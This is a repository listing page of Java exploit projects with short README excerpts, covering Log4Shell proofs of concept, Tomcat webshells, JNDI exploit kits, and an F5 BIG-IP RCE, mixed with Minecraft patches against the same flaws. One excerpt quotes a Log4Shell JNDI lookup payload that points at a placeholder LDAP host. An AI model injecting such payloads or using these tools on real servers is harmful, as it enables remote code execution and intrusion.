24 Repositories
Java exploit Libraries
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A pre-authenticated RCE exploit for Inductive Automation Ignition
Randy What This is a pre-authenticated RCE exploit for Inductive Automation Ignition that impacts versions = 8.1.16. We failed to exploit the bugs at
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
log4j2 remote code execution or IP leakage exploit (with examples)
log4j2-exploits 2021-12-11.12-17-44.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
Fixes the log4j exploit from being sent to Minecraft clients.
⚠️ DEPRECATION ⚠️ Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already
Protect your Spigot server against IP forwarding exploits, as well as blocking unknown BungeeCord and/or Velocity proxies.
Sentey Protect your Spigot server against IP forwarding exploits, as well as blocking unknown BungeeCord and/or Velocity proxies. But firewalls are a
LecternCrashFix - Fixes the lectern crash/exploit.
LecternCrashFix This fixes the new lectern crash/exploit. This bug is fixed on Paper build 276 and above. This is also fixed on CraftBukkit. Make sure
Simple plugin made for TimBW HCF to fix pearling noclip exploit
Simple plugin made for TimBW HCF to fix pearling noclip exploit. It currently can prevent pearl glitching throught blocks, and fences like all servers! Basic features implemented, so you can use this in production. 😃
LOG4J Java exploit - WAF and patches bypass tricks
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tr
JNDI-Exploit-Kit
JNDI-Exploit-Kit Disclaimer This is a forked modified version of the great exploitation tool created by @welk1n
A fabric client-side mod for an invincibility exploit.
invincibility-hack How to use: Type '*invincibility' in the chat to toggle the hack. Now once you die you will not see the death screen. After dying r
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use
NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use -Dlog4
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
A short demo of CVE-2021-44228
sample-ldap-exploit A short demo of CVE-2021-44228 Build $ mvn clean verify Run Attacker $ java \ -cp 'attacker/target/sample-attacker.jar:attacker
JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.
JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi
Don't use this maliciously, this is for testing
log4j-exploit-example Don't use this maliciously, this is for testing Specifically for testing within Minecraft, but this will probably work on other
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4
A exploit to remotely check if a chunk is loaded.
InteractCordExploit (NoCom) A exploit to remotely check if a chunk is loaded which has been automated to create heatmaps and find chunks with active p
Funny exploit lol
InstantMine Funny exploit lol Found a few weeks back and now paid clients like konas are getting it so making it public :^) I come from constantiam so